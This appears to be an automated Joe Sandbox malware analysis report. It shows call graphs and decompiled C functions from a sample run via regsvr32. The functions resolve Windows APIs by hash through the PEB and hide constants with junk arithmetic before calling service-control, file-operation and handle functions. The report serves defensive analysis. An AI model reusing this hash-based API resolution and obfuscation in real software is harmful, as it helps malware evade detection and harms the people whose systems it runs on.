4758->4759 4760 47fbed 4759->4760 4760->4742 4762 48ac56 4761->4762 4763 48bff0 GetPEB 4762->4763 4764 48ace2 4763->4764 4764->4742 4768 474361 4765->4768 4766 474627 GetPEB 4766->4768 4767 4745f4 4767->4644 4768->4766 4768->4767 4769 48eaa3 2 API calls 4768->4769 4769->4768 4772 48a4e1 4770->4772 4771 48e436 GetPEB 4771->4772 4772->4771 4773 48a861 4772->4773 4774 48eaa3 2 API calls 4772->4774 4776 48a872 4772->4776 4775 476a8d GetPEB 4773->4775 4774->4772 4775->4776 4776->4644 4778 478bde 4777->4778 4779 481d1c GetPEB 4778->4779 4780 478c72 4779->4780 4780->4644 4782 49041a 4781->4782 4784 490738 4782->4784 4785 4906d7 4782->4785 4802 476bfa 4782->4802 4784->4108 4786 48e18b 2 API calls 4785->4786 4787 4906f1 4786->4787 4793 48112d 4787->4793 4792 47b9d7 GetPEB 4792->4784 4806 474b09 4793->4806 4797 4812e4 4798 48ef56 4797->4798 4799 48ef7b 4798->4799 4800 47f56b GetPEB 4799->4800 4801 48ef98 4800->4801 4801->4792 4803 476c16 4802->4803 4804 48bff0 GetPEB 4803->4804 4805 476cad 4804->4805 4805->4782 4807 474b23 4806->4807 4808 48bff0 GetPEB 4807->4808 4809 474ba7 4808->4809 4809->4797 4810 48683f 4809->4810 4811 486871 4810->4811 4812 48bff0 GetPEB 4811->4812 4813 486911 4812->4813 4813->4797 4815 47bcba 4814->4815 4816 47bd24 4815->4816 4817 476a8d GetPEB 4815->4817 4818 474cb9 GetPEB 4815->4818 4820 48e373 2 API calls 4815->4820 4908 480f7a 4815->4908 4816->4120 4817->4815 4818->4815 4820->4815 4830 490d01 4821->4830 4822 490d19 4916 4863f0 4822->4916 4823 479574 GetPEB 4823->4830 4825 490d42 4825->4120 4826 47ffde GetPEB 4826->4830 4828 474bb4 2 API calls 4828->4830 4829 48734a GetPEB 4829->4830 4830->4822 4830->4823 4830->4825 4830->4826 4830->4828 4830->4829 4831 47b9d7 GetPEB 4830->4831 4926 47b200 4830->4926 4930 479b80 4830->4930 4831->4830 4941 48e034 4833->4941 4835 4863f0 3 API calls 4852 48fedc 4835->4852 4836 4866c2 2 API calls 4836->4852 4837 48ade9 GetPEB 4837->4852 4838 4851e8 2 API calls 4838->4852 4839 474bb4 RtlAllocateHeap GetPEB 4839->4852 
4840 4902ff 4843 48e373 2 API calls 4840->4843 4842 4902fd 4842->4120 4843->4842 4845 479574 GetPEB 4845->4852 4846 481bed GetPEB 4846->4852 4847 476a8d GetPEB 4847->4852 4848 47ffde GetPEB 4848->4852 4849 47b200 GetPEB 4849->4852 4850 48734a GetPEB 4850->4852 4851 47b9d7 GetPEB 4851->4852 4852->4835 4852->4836 4852->4837 4852->4838 4852->4839 4852->4840 4852->4842 4852->4845 4852->4846 4852->4847 4852->4848 4852->4849 4852->4850 4852->4851 4853 479b80 3 API calls 4852->4853 4944 47f784 4852->4944 4950 47d7a6 4852->4950 4853->4852 4870 472bc8 4854->4870 4855 4863f0 3 API calls 4855->4870 4858 479574 GetPEB 4858->4870 4859 48e373 GetPEB CloseHandle 4859->4870 4860 4730be GetPEB 4860->4870 4862 47ffde GetPEB 4862->4870 4863 472c16 4864 48e373 2 API calls 4863->4864 4866 472c31 4864->4866 4865 47b200 GetPEB 4865->4870 4866->4120 4867 474bb4 2 API calls 4867->4870 4868 48734a GetPEB 4868->4870 4869 47b9d7 GetPEB 4869->4870 4870->4855 4870->4858 4870->4859 4870->4860 4870->4862 4870->4863 4870->4865 4870->4866 4870->4867 4870->4868 4870->4869 4871 479b80 3 API calls 4870->4871 4954 490e6d 4870->4954 4962 47fbf8 4870->4962 4965 47db59 4870->4965 4871->4870 4878 47d206 4872->4878 4873 48aa59 GetPEB 4873->4878 4874 47d24f 4874->4120 4875 47d23b 4877 480f7a GetPEB 4875->4877 4877->4874 4878->4873 4878->4874 4878->4875 4996 473c51 4878->4996 5004 480e0b 4878->5004 4886 491738 4880->4886 4881 48aa59 GetPEB 4881->4886 4882 491781 4882->4120 4883 49176d 4885 480f7a GetPEB 4883->4885 4884 473c51 GetPEB 4884->4886 4885->4882 4886->4881 4886->4882 4886->4883 4886->4884 4887 480e0b GetPEB 4886->4887 4887->4886 4897 48710c 4888->4897 4889 479574 GetPEB 4889->4897 4890 487128 4891 4866c2 2 API calls 4890->4891 4893 48715b 4891->4893 4892 47ffde GetPEB 4892->4897 4894 474bb4 2 API calls 4893->4894 4896 48717e 4894->4896 4895 47b200 GetPEB 4895->4897 4898 48734a GetPEB 4896->4898 4897->4889 4897->4890 4897->4892 4897->4895 4899 474bb4 2 API calls 4897->4899 4902 48734a GetPEB 
4897->4902 4905 47b9d7 GetPEB 4897->4905 4906 487210 4897->4906 4907 479b80 3 API calls 4897->4907 4900 4871be 4898->4900 4899->4897 4901 47b9d7 GetPEB 4900->4901 4903 4871d6 4901->4903 4902->4897 4904 4863f0 3 API calls 4903->4904 4904->4906 4905->4897 4906->4120 4907->4897 4909 480f8d 4908->4909 4912 491bd6 4909->4912 4913 491bf5 4912->4913 4914 48bff0 GetPEB 4913->4914 4915 481069 4914->4915 4915->4815 4917 48641e 4916->4917 4918 47b184 GetPEB 4917->4918 4919 48663b 4918->4919 4920 4846e0 2 API calls 4919->4920 4921 486676 4920->4921 4922 48e373 2 API calls 4921->4922 4925 486683 4921->4925 4923 4866a3 4922->4923 4924 48e373 2 API calls 4923->4924 4924->4925 4925->4825 4927 47b219 4926->4927 4928 47f2b9 GetPEB 4927->4928 4929 47b2e7 4928->4929 4929->4830 4932 479b9f 4930->4932 4933 479e5e 4932->4933 4934 48bf1c 2 API calls 4932->4934 4936 479e5c 4932->4936 4937 48454e 4932->4937 4935 48e373 2 API calls 4933->4935 4934->4932 4935->4936 4936->4830 4938 484575 4937->4938 4939 48bff0 GetPEB 4938->4939 4940 484615 4939->4940 4940->4932 4942 48bff0 GetPEB 4941->4942 4943 48e0c1 4942->4943 4943->4852 4947 47f7a0 4944->4947 4945 47f985 4948 474627 GetPEB 4945->4948 4946 47f983 4946->4852 4947->4945 4947->4946 4949 48eaa3 2 API calls 4947->4949 4948->4946 4949->4947 4951 47d7d6 4950->4951 4952 48bff0 GetPEB 4951->4952 4953 47d87c 4952->4953 4953->4852 4957 490e92 4954->4957 4956 47fbf8 GetPEB 4956->4957 4957->4956 4959 491061 4957->4959 4961 491076 4957->4961 4976 48d0a1 4957->4976 4980 472f1a 4957->4980 4960 48e373 2 API calls 4959->4960 4960->4961 4961->4870 4963 48bff0 GetPEB 4962->4963 4964 47fcac 4963->4964 4964->4870 4966 47db99 4965->4966 4968 47b184 GetPEB 4966->4968 4969 47df48 4966->4969 4971 47e07b 4966->4971 4972 474bb4 2 API calls 4966->4972 4975 47b9d7 GetPEB 4966->4975 4988 485a47 4966->4988 4992 48e8e7 4966->4992 4968->4966 4984 491d6d 4969->4984 4971->4971 4972->4966 4975->4966 4977 48d0bd 4976->4977 4978 48bff0 GetPEB 4977->4978 4979 48d13e 4978->4979 
4979->4957 4981 472f3e 4980->4981 4982 48bff0 GetPEB 4981->4982 4983 472fcc 4982->4983 4983->4957 4985 491d80 4984->4985 4986 48bff0 GetPEB 4985->4986 4987 47df59 4986->4987 4987->4870 4989 485a82 4988->4989 4990 48bff0 GetPEB 4989->4990 4991 485b29 4990->4991 4991->4966 4993 48e902 4992->4993 4994 48bff0 GetPEB 4993->4994 4995 48e994 4994->4995 4995->4966 4997 473c6f 4996->4997 4998 473eff 4997->4998 5009 483ff6 4997->5009 4998->4878 5001 481d1c GetPEB 5003 473eb6 5001->5003 5002 481d1c GetPEB 5002->5003 5003->4998 5003->5002 5007 480e27 5004->5007 5005 480f48 5005->4878 5006 48e9a4 GetPEB 5006->5007 5007->5005 5007->5006 5013 473455 5007->5013 5010 484017 5009->5010 5011 48bff0 GetPEB 5010->5011 5012 473e94 5011->5012 5012->4998 5012->5001 5014 473468 5013->5014 5015 48bff0 GetPEB 5014->5015 5016 473502 5015->5016 5016->5007 5018 48da29 5017->5018 5019 48bff0 GetPEB 5018->5019 5020 473149 5019->5020 5020->3927 5022 485cca 5021->5022 5023 48bff0 GetPEB 5022->5023 5024 485d5a 5023->5024 5024->4143 5026 4800ae 5025->5026 5027 48eaa3 2 API calls 5026->5027 5028 48040e 5026->5028 5029 487394 GetPEB 5026->5029 5027->5026 5028->4143 5029->5026 5031 47f61e 5030->5031 5032 48bff0 GetPEB 5031->5032 5033 47f6be 5032->5033 5033->4143 5035 48bff0 GetPEB 5034->5035 5036 47e370 5035->5036 5036->4143 5038 47f9bd 5037->5038 5039 48bff0 GetPEB 5038->5039 5040 47fa61 5039->5040 5040->4139 5042 485c1b 5041->5042 5043 48bff0 GetPEB 5042->5043 5044 485ca5 5043->5044 5044->4148 5046 47e0fe 5045->5046 5047 48bff0 GetPEB 5046->5047 5048 47e19d 5047->5048 5048->4148 5052 47d8af 5049->5052 5051 47da67 5073 47ff02 5051->5073 5052->5051 5054 47b184 GetPEB 5052->5054 5055 47da65 5052->5055 5069 481c3c 5052->5069 5054->5052 5055->4166 5064 479425 5056->5064 5057 474bb4 2 API calls 5057->5064 5058 473f09 GetPEB 5058->5064 5059 47954c 5060 473152 GetPEB 5059->5060 5062 47954a 5060->5062 5061 47b9d7 GetPEB 5061->5064 5062->4166 5064->5057 5064->5058 5064->5059 5064->5061 5064->5062 5077 48462a 
5064->5077 5066 47f6e5 5065->5066 5067 48bff0 GetPEB 5066->5067 5068 47f778 5067->5068 5068->4171 5070 481c5e 5069->5070 5071 48bff0 GetPEB 5070->5071 5072 481d0f 5071->5072 5072->5052 5074 47ff24 5073->5074 5075 48bff0 GetPEB 5074->5075 5076 47ffca 5075->5076 5076->5055 5078 484649 5077->5078 5079 48bff0 GetPEB 5078->5079 5080 4846d3 5079->5080 5080->5064
C-Code - Quality: 58%
E0047F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
	signed int _v8;
	unsigned int _v12;
	unsigned int _v16;
	signed int _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	void* _t49;
	intOrPtr* _t58;
	void* _t59;
	signed int _t62;
	void* _t67;
	void* _t68;

	_t68 = __edx;
	_t67 = __ecx;
	E00479E7D(_t49);
	_v36 = 0xea873e;
	_v32 = 0xb2392b;
	_v28 = 0;
	_v24 = 0;
	_v12 = 0xdc192d;
	_v12 = _v12 >> 0xa;
	_v12 = _v12 >> 0xf;
	_v12 = _v12 + 0x11b5;
	_v12 = _v12 ^ 0x0007f5c7;
	_v20 = 0x6dcef4;
	_t62 = 0x6b;
	_v20 = _v20 * 0x54;
	_v20 = _v20 << 0x10;
	_v20 = _v20 ^ 0xe81a0a50;
	_v16 = 0x9ccfab;
	_v16 = _v16 | 0xc76ed5d6;
	_v16 = _v16 >> 0xf;
	_v16 = _v16 ^ 0x000c5bda;
	_v8 = 0xcca784;
	_v8 = _v8 / _t62;
	_v8 = _v8 >> 0xf;
	_v8 = _v8 ^ 0x01549e3f;
	_v8 = _v8 ^ 0x01571d5c;
	_t58 = E0048BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
	_t59 = *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
	return _t59;
}
                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0047F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: e644b52bfb087a88701387e09f6569e07726accb1c88d736d1bf81bc468dbd3d
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 962177B5D0020DAFDB08DFA5C88A8EEFBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 4732b5-47338a call 479e7d call 48bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004732B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				short* _v24;
                                                                                                                				short* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t49;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				E00479E7D(_t49);
                                                                                                                				_v32 = 0xf329ca;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v16 = 0x2373b;
                                                                                                                				_t64 = 0x7a;
                                                                                                                				_v16 = _v16 * 0x75;
                                                                                                                				_t65 = 0x3d;
                                                                                                                				_v16 = _v16 / _t64;
                                                                                                                				_v16 = _v16 ^ 0x00061266;
                                                                                                                				_v12 = 0xb7be71;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 + 0xafdb;
                                                                                                                				_v12 = _v12 ^ 0x7920a4e8;
                                                                                                                				_v12 = _v12 ^ 0x79205c77;
                                                                                                                				_v8 = 0x1abc5;
                                                                                                                				_v8 = _v8 / _t65;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x07f89b39;
                                                                                                                				_v8 = _v8 ^ 0x07caeaee;
                                                                                                                				_v20 = 0x49b926;
                                                                                                                				_v20 = _v20 * 0x47;
                                                                                                                				_v20 = _v20 ^ 0x147483b3;
                                                                                                                				E0048BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
                                                                                                                				_t62 = OpenSCManagerW(0, 0, _a4); // executed
                                                                                                                				return _t62;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00473384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: c07d2e44635da6ce81b43373f85e3fdf19324b0ab3b6fe3ffe4beb3d661cdc2c
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 5A2112B5D01228FBCB04DFAAD84A9EEBFB5EB40304F20818AE524A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 47c4eb-47c5c2 call 479e7d call 48bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0047C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t46;
                                                                                                                				void* _t54;
                                                                                                                				int _t58;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00479E7D(_t46);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v36 = 0xd40f1;
                                                                                                                				_v32 = 0xcb52a0;
                                                                                                                				_v28 = 0x146fa1;
                                                                                                                				_v20 = 0xb8dab7;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x0b80f677;
                                                                                                                				_v8 = 0x87dd92;
                                                                                                                				_v8 = _v8 + 0xffffe9d3;
                                                                                                                				_v8 = _v8 * 0x55;
                                                                                                                				_v8 = _v8 << 0xa;
                                                                                                                				_v8 = _v8 ^ 0x54d92ec5;
                                                                                                                				_v16 = 0xb88fea;
                                                                                                                				_v16 = _v16 | 0xf85cd4fd;
                                                                                                                				_v16 = _v16 + 0xed22;
                                                                                                                				_v16 = _v16 ^ 0xf8f0d6dc;
                                                                                                                				_v12 = 0x2c3d87;
                                                                                                                				_v12 = _v12 + 0x3690;
                                                                                                                				_v12 = _v12 + 0xfffff048;
                                                                                                                				_v12 = _v12 ^ 0x0029d00c;
                                                                                                                				E0048BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
                                                                                                                				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
                                                                                                                				return _t54;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0047C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: f340523a7c46149766d1f57092d0282b3e1a3f0b6a46834ef0bb16cc25f87ad4
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 00211FB5C00209ABCF15DFA5D8499EEBBB4EF14318F108588EA25A6260E3B55B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 48a98e-48aa51 call 479e7d call 48bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0048A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t45;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E00479E7D(_t45);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v28 = 0xdfb18c;
                                                                                                                				_v12 = 0xac05d3;
                                                                                                                				_v12 = _v12 + 0xffffe692;
                                                                                                                				_t60 = 6;
                                                                                                                				_v12 = _v12 * 0xa;
                                                                                                                				_v12 = _v12 ^ 0x06b0bc77;
                                                                                                                				_v20 = 0xcbcea5;
                                                                                                                				_t61 = 0x73;
                                                                                                                				_v20 = _v20 / _t60;
                                                                                                                				_v20 = _v20 ^ 0x0026c0c8;
                                                                                                                				_v16 = 0x706a69;
                                                                                                                				_v16 = _v16 + 0xffff322e;
                                                                                                                				_v16 = _v16 ^ 0x006745ff;
                                                                                                                				_v8 = 0xc7f3e7;
                                                                                                                				_v8 = _v8 * 0x7b;
                                                                                                                				_v8 = _v8 + 0xffffee1e;
                                                                                                                				_v8 = _v8 / _t61;
                                                                                                                				_v8 = _v8 ^ 0x00d4d133;
                                                                                                                				E0048BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
                                                                                                                				_t58 = CloseServiceHandle(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0048AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: 2abb536a8cdfd02320a917172c3a87bfdae446d42f2e8264f9e780096d312ae1
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: BE2117B5D0520DFBEF04DFA5D98A9AEBBB5EB40304F10C19AE404AB260D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 513 47338b-473454 call 479e7d call 48bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0047338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t46;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E00479E7D(_t46);
                                                                                                                				_v28 = _v28 & 0x00000000;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v32 = 0x221b15;
                                                                                                                				_v20 = 0x156690;
                                                                                                                				_t60 = 5;
                                                                                                                				_v20 = _v20 * 0x69;
                                                                                                                				_v20 = _v20 ^ 0x08c90ac4;
                                                                                                                				_v12 = 0x1a8107;
                                                                                                                				_v12 = _v12 / _t60;
                                                                                                                				_v12 = _v12 | 0x5e0d12b3;
                                                                                                                				_v12 = _v12 * 0x36;
                                                                                                                				_v12 = _v12 ^ 0xd6d73012;
                                                                                                                				_v8 = 0x305b7c;
                                                                                                                				_v8 = _v8 + 0xffffaa6a;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 | 0xeac0b19d;
                                                                                                                				_v8 = _v8 ^ 0xeaf3a664;
                                                                                                                				_v16 = 0x5b8d10;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 + 0x95d4;
                                                                                                                				_v16 = _v16 ^ 0x258da45e;
                                                                                                                				E0048BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
                                                                                                                				_t58 = SHFileOperationW(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0047344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: d8b6afae6e6ac4d1f10185526c7305954a6811ad415fafffb0548f62f7acc900
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: F12106B4D01209EFDF04DFA5C94AAEEBBB4FF10315F10858DE424AA291D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0048E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t41;
                                                                                                                				int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E00479E7D(_t41);
                                                                                                                				_v20 = 0xc362e1;
                                                                                                                				_v20 = _v20 + 0xffff2419;
                                                                                                                				_v20 = _v20 + 0xffff15b9;
                                                                                                                				_v20 = _v20 ^ 0x00c90db5;
                                                                                                                				_v16 = 0x370fa8;
                                                                                                                				_v16 = _v16 + 0x3ddc;
                                                                                                                				_v16 = _v16 + 0xfffffca4;
                                                                                                                				_v16 = _v16 ^ 0x003af0ce;
                                                                                                                				_v8 = 0x58cda3;
                                                                                                                				_t53 = 0x37;
                                                                                                                				_v8 = _v8 / _t53;
                                                                                                                				_v8 = _v8 | 0xee3498e5;
                                                                                                                				_v8 = _v8 + 0xffff3fab;
                                                                                                                				_v8 = _v8 ^ 0xee3595ac;
                                                                                                                				_v12 = 0xe7384d;
                                                                                                                				_v12 = _v12 + 0x2a59;
                                                                                                                				_v12 = _v12 * 0x31;
                                                                                                                				_v12 = _v12 ^ 0x2c4bf561;
                                                                                                                				E0048BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
                                                                                                                				_t51 = CloseHandle(_t58); // executed
                                                                                                                				return _t51;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00483F2A,00000000), ref: 0048E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: df8dc33bf722dda5e050a392258a99e9571bc929f705472397b2d82fc823e6f5
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: A71129B5D00209EFDF58DFA4C9498DEBBB4EB40324F108299E824B62A1D7B55B059F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
